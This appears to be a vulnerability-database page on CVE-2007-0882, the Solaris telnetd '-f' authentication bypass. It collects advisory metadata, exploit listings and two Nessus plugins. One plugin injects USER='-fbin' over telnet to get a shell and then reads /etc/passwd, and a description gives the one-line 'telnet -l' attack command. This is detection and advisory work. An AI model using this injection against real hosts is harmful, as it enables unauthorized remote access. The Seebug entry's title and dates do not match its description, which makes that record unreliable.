Vulnerabilities > CVE-2007-0882 - Argument Injection or Modification vulnerability in multiple products
Attack vector | UNKNOWN |
Attack complexity | UNKNOWN |
Privileges required | UNKNOWN |
Confidentiality impact | UNKNOWN |
Integrity impact | UNKNOWN |
Availability impact | UNKNOWN |
Summary
Argument injection vulnerability in the telnet daemon (in.telnetd) in Solaris 10 and 11 (SunOS 5.10 and 5.11) misinterprets certain client "-f" sequences as valid requests for the login program to skip authentication, which allows remote attackers to log into certain accounts, as demonstrated by the bin account.
Vulnerable Configurations
Part | Description | Count
---|---|---
OS | 2 |
OS | 2 |
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Try All Common Application Switches and Options: An attacker attempts to invoke all common switches and options in the target application for the purpose of discovering weaknesses in the target. For example, in some applications, adding a --debug switch causes debugging information to be displayed, which can sometimes reveal sensitive processing or configuration information to an attacker. This attack differs from other forms of API abuse in that the attacker is blindly attempting to invoke options in the hope that one of them will work rather than specifically targeting a known option. Nonetheless, even if the attacker is familiar with the published options of a targeted application, this attack method may still be fruitful as it might discover unpublicized functionality.
- Using Meta-characters in E-mail Headers to Inject Malicious Payloads: This type of attack involves an attacker leveraging meta-characters in email headers to inject improper behavior into email programs. Email software has become increasingly sophisticated and feature-rich. In addition, email applications are ubiquitous and connected directly to the Web, making them ideal targets to launch and propagate attacks. As the user demand for new functionality in email applications grows, they become more like browsers with complex rendering and plug-in routines. As more email functionality is included and abstracted from the user, this creates opportunities for attackers. Virtually all email applications do not list email header information by default; however, the email header contains valuable attack vectors for the attacker to exploit, particularly if the behavior of the email client application is known. Meta-characters are hidden from the user, but can contain scripts, enumerations, probes, and other attacks against the user's system.
- HTTP Parameter Pollution (HPP): An attacker overrides or adds HTTP GET/POST parameters by injecting query string delimiters. Via HPP it may be possible to override existing hardcoded HTTP parameters, modify the application behavior, access and potentially exploit uncontrollable variables, and bypass input validation checkpoints and WAF rules.
- OS Command Injection: In this type of attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.
Exploit-Db
description | Sun Solaris Telnet Remote Authentication Bypass Vulnerability. CVE-2007-0882. Remote exploit for solaris platform |
id | EDB-ID:16328 |
last seen | 2016-02-01 |
modified | 2010-06-22 |
published | 2010-06-22 |
reporter | metasploit |
source | https://www.exploit-db.com/download/16328/ |
title | Sun Solaris Telnet Remote Authentication Bypass Vulnerability |

description | SunOS 5.10/5.11 in.telnetd Remote Authentication Bypass Exploit. CVE-2007-0882. Remote exploit for solaris platform |
file | exploits/solaris/remote/3293.sh |
id | EDB-ID:3293 |
last seen | 2016-01-31 |
modified | 2007-02-11 |
platform | solaris |
port | 23 |
published | 2007-02-11 |
reporter | kingcope |
source | https://www.exploit-db.com/download/3293/ |
title | SunOS 5.10/5.11 in.telnetd Remote Authentication Bypass Exploit |
type | remote |

description | Solaris 10, 11 Telnet Remote Authentication Bypass. CVE-2007-0882. Remote exploit for solaris platform |
id | EDB-ID:9918 |
last seen | 2016-02-01 |
modified | 2007-02-12 |
published | 2007-02-12 |
reporter | MC |
source | https://www.exploit-db.com/download/9918/ |
title | Solaris 10 / 11 Telnet - Remote Authentication Bypass |
Metasploit
description | This module exploits the argument injection vulnerability in the telnet daemon (in.telnetd) of Solaris 10 and 11. |
id | MSF:EXPLOIT/SOLARIS/TELNET/FUSER |
last seen | 2020-06-13 |
modified | 2017-09-08 |
published | 2007-02-17 |
references | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882 |
reporter | Rapid7 |
source | https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/solaris/telnet/fuser.rb |
title | Sun Solaris Telnet Remote Authentication Bypass Vulnerability |
Nessus
NASL family | Solaris Local Security Checks |
NASL id | SOLARIS10_X86_120069.NASL |
description | SunOS 5.10_x86: in.telnetd patch. Date this patch was last updated by Sun : Feb/21/07 |
last seen | 2018-09-01 |
modified | 2018-08-13 |
plugin id | 24342 |
published | 2007-02-14 |
reporter | Tenable |
source | https://www.tenable.com/plugins/index.php?view=single&id=24342 |
title | Solaris 10 (x86) : 120069-03 |
code |

```
#%NASL_MIN_LEVEL 80502
# @DEPRECATED@
#
# This script has been deprecated as the associated patch is not
# currently a recommended security fix.
#
# Disabled on 2011/09/17.
#
# (C) Tenable Network Security, Inc.
#
#

if ( ! defined_func("bn_random") ) exit(0);
include("compat.inc");

if(description)
{
  script_id(24342);
  script_version("1.26");
  script_name(english: "Solaris 10 (x86) : 120069-03");
  script_cve_id("CVE-2007-0882");
  script_set_attribute(attribute: "synopsis", value:
"The remote host is missing Sun Security Patch number 120069-03");
  script_set_attribute(attribute: "description", value:
'SunOS 5.10_x86: in.telnetd patch.
Date this patch was last updated by Sun : Feb/21/07');
  script_set_attribute(attribute: "solution", value:
"You should install this patch for your system to be up-to-date.");
  script_set_attribute(attribute: "see_also", value: "https://getupdates.oracle.com/readme/120069-03");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Sun Solaris Telnet Remote Authentication Bypass Vulnerability');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');
  script_cwe_id(94);
  script_set_attribute(attribute:"plugin_publication_date", value: "2007/02/14");
  script_cvs_date("Date: 2019/10/25 13:36:24");
  script_set_attribute(attribute:"patch_publication_date", value: "2007/02/13");
  script_set_attribute(attribute:"vuln_publication_date", value: "2007/02/10");
  script_end_attributes();

  script_summary(english: "Check for patch 120069-03");
  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.");
  family["english"] = "Solaris Local Security Checks";
  script_family(english:family["english"]);
  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/Solaris/showrev");
  exit(0);
}

# Deprecated.
exit(0, "The associated patch is not currently a recommended security fix.");
```
NASL family | Gain a shell remotely |
NASL id | SOLARIS10_TELNET_ENV.NASL |
description | The remote version of telnet does not sanitize the user-supplied |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 24323 |
published | 2007-02-12 |
reporter | This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/24323 |
title | Solaris 10 Forced Login Telnet Authentication Bypass |
code |

```
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(24323);
  script_version("1.32");
  script_cve_id("CVE-2007-0882");
  script_bugtraq_id(22512);

  script_name(english:"Solaris 10 Forced Login Telnet Authentication Bypass");
  script_set_attribute(attribute:"synopsis", value:
"It is possible to log into the remote system using telnet without supplying any credentials" );
  script_set_attribute(attribute:"description", value:
"The remote version of telnet does not sanitize the user-supplied 'USER' environment
variable. By supplying a specially malformed USER environment variable, an attacker may
force the remote telnet server to believe that the user has already authenticated.

For instance, the following command :

telnet -l '-fbin' target.example.com

will result in obtaining a shell with the privileges of the 'bin' user." );
  script_set_attribute(attribute:"solution", value:
"Install patches 120068-02 (sparc) or 120069-02 (i386), which are available from Sun.
Filter incoming to this port or disable the telnet service and use SSH instead, or use
inetadm to mitigate this problem (see the link below)." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Sun Solaris Telnet Remote Authentication Bypass Vulnerability');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');
  script_cwe_id(94);
  script_set_attribute(attribute:"see_also", value:"http://lists.sans.org/pipermail/list/2007-February/025935.html" );
  script_set_attribute(attribute:"see_also", value:"http://isc.sans.org/diary.html?storyid=2220" );
  script_set_attribute(attribute:"plugin_publication_date", value: "2007/02/12");
  script_set_attribute(attribute:"patch_publication_date", value: "2007/02/13");
  script_set_attribute(attribute:"vuln_publication_date", value: "2007/02/10");
  script_cvs_date("Date: 2019/10/25 13:36:24");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:sun:solaris");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_summary(english:"Attempts to log in as -fbin");
  script_category(ACT_ATTACK);
  script_copyright(english:"This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Gain a shell remotely");
  script_dependencie("find_service1.nasl", "openwrt_blank_telnet_password.nasl");
  script_exclude_keys("openwrt/blank_telnet_password");
  script_require_ports("Services/telnet", 23);
  exit(0);
}

include("data_protection.inc");

if (get_kb_item("openwrt/blank_telnet_password"))
  exit(0, "Ignoring host with an unpassworded OpenWrt Telnet service.");

OPT_WILL      = 0xfb;
OPT_WONT      = 0xfc;
OPT_DO        = 0xfd;
OPT_DONT      = 0xfe;
OPT_SUBOPT    = 0xfa;
OPT_ENDSUBOPT = 0xf0;
OPT_ENV       = 0x27;

port = get_kb_item("Services/telnet");
if(!port) port = 23;
if(!get_port_state(port))exit(0);

soc = open_sock_tcp(port);
if ( ! soc ) exit(0);

send(socket:soc, data:raw_string(0xff, OPT_WILL, OPT_ENV));
timeout = 5;

while ( TRUE )
{
  counter ++;
  if ( counter > 200 ) break;
  s = recv(socket:soc, length:1, timeout:timeout);
  timeout = 5;
  if ( strlen(s) == 0 ) break;
  # End of options ?
  if ( ord(s[0]) != 0xff ) break;
  else
  {
    s = recv(socket:soc, length:2);
    if ( strlen(s) != 2 ) break;
    if ( ord(s[0]) == OPT_DO && ord(s[1]) == OPT_ENV )
    {
      send(socket:soc, data:raw_string(0xff, OPT_SUBOPT, OPT_ENV) + raw_string(0,0) + 'USER' + raw_string(1) + '-fbin' + raw_string(0xff, OPT_ENDSUBOPT));
    }
    else if ( ord(s[0]) == OPT_DO && ord(s[1]) != OPT_ENV )
      send(socket:soc, data:raw_string(0xff, OPT_WONT) + s[1]);
    else if ( ord(s[0]) == OPT_WILL )
      send(socket:soc, data:raw_string(0xff, OPT_DONT) + s[1]);
    else if ( ord(s[0]) == OPT_SUBOPT )
    {
      prev = recv(socket:soc, length:1);
      counter2 = 0;
      while ( strlen(prev) && ord(prev[0]) != 0xff && ord(s[0]) != OPT_ENDSUBOPT )
      {
        prev = s;
        # No timeout - the answer is supposed to be cached
        s = recv(socket:soc, length:1, timeout:0);
        if ( ! strlen(s) ) exit(0);
        counter2++;
        if ( counter2 >= 100 ) exit(0);
      }
    }
  }
}

r = recv(socket:soc, length:4096);
send(socket:soc, data:'id\r\n');
r = recv(socket:soc, length:4096, min:4096);
if ( (uid = egrep(pattern:"uid=", string:r)) )
{
  send(socket:soc, data:'cat /etc/passwd\r\n');
  passwd = recv(socket:soc, length:65535, min:65535);
  passwd = data_protection::redact_etc_passwd(output:passwd);
  report = 'It was possible to log into the remote host as \'bin\' :\n' + uid + '\nThe file /etc/passwd contains :\n\n' + passwd;
  security_hole(port:port, extra:report);
}
```
NASL family | Solaris Local Security Checks |
NASL id | SOLARIS10_120068.NASL |
description | SunOS 5.10: in.telnetd patch. Date this patch was last updated by Sun : Feb/21/07 |
last seen | 2018-09-01 |
modified | 2018-08-13 |
plugin id | 24343 |
published | 2007-02-14 |
reporter | Tenable |
source | https://www.tenable.com/plugins/index.php?view=single&id=24343 |
title | Solaris 10 (sparc) : 120068-03 |
Oval
accepted | 2007-09-27T08:57:46.156-04:00 |
class | vulnerability |
contributors | |
definition_extensions | |
description | Argument injection vulnerability in the telnet daemon (in.telnetd) in Solaris 10 and 11 (SunOS 5.10 and 5.11) misinterprets certain client "-f" sequences as valid requests for the login program to skip authentication, which allows remote attackers to log into certain accounts, as demonstrated by the bin account. |
family | unix |
id | oval:org.mitre.oval:def:2202 |
status | accepted |
submitted | 2007-08-10T12:25:19.000-04:00 |
title | Security Vulnerability in the in.telnetd(1M) Daemon May Allow Unauthorized Remote Users to Gain Access to a Solaris Host |
version | 35 |
Packetstorm
data source | https://packetstormsecurity.com/files/download/82328/fuser.rb.txt |
id | PACKETSTORM:82328 |
last seen | 2016-12-05 |
published | 2009-10-28 |
reporter | MC |
source | https://packetstormsecurity.com/files/82328/Sun-Solaris-Telnet-Remote-Authentication-Bypass.html |
title | Sun Solaris Telnet Remote Authentication Bypass |
Saint
bid | 22512 |
description | Solaris telnetd authentication bypass |
id | pass_solaristelnetbypass |
osvdb | 31881 |
title | solaris_telnetd_auth |
type | remote |
Seebug
bulletinFamily | exploit |
description | Vulnerability description: Solaris is a commercial UNIX operating system developed and maintained by Sun. The TELNET service in Solaris 10 has a vulnerability in its handling of malformed authentication data; a remote attacker may exploit it to bypass authentication and gain access. The Solaris 10 telnet daemon passes possibly malformed user-supplied arguments directly to the login process without checking them, and the login process consequently performs an unintended user identity switch. This may allow a user to log into the system with the privileges of certain privileged accounts without a password and obtain full system access; if the system does not restrict where the root user may log in from, obtaining root access is also possible. CVE-ID: CVE-2007-0882. CNNVD-ID: CNNVD-200702-224. Official CVE link: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882. The vendor has released a patch to fix this security issue; patch download link: http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102802-1 |
id | SSV:18010 |
last seen | 2017-11-19 |
modified | 2002-01-18 |
published | 2002-01-18 |
reporter | Root |
source | https://www.seebug.org/vuldb/ssvid-18010 |
title | Solaris in.telnetd TTYPROMPT Buffer Overflow |
References
- http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html
- http://isc.sans.org/diary.html?storyid=2220
- http://osvdb.org/31881
- http://seclists.org/fulldisclosure/2007/Feb/0217.html
- http://secunia.com/advisories/24120
- http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1
- http://www.kb.cert.org/vuls/id/881872
- http://www.securityfocus.com/archive/1/459831/100/0/threaded
- http://www.securityfocus.com/archive/1/459843/100/0/threaded
- http://www.securityfocus.com/archive/1/459855/100/0/threaded
- http://www.securityfocus.com/archive/1/459980/100/0/threaded
- http://www.securityfocus.com/archive/1/460086/100/100/threaded
- http://www.securityfocus.com/archive/1/460103/100/100/threaded
- http://www.securityfocus.com/bid/22512
- http://www.securitytracker.com/id?1017625
- http://www.us-cert.gov/cas/techalerts/TA07-059A.html
- http://www.vupen.com/english/advisories/2007/0560
- https://exchange.xforce.ibmcloud.com/vulnerabilities/32434
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A2202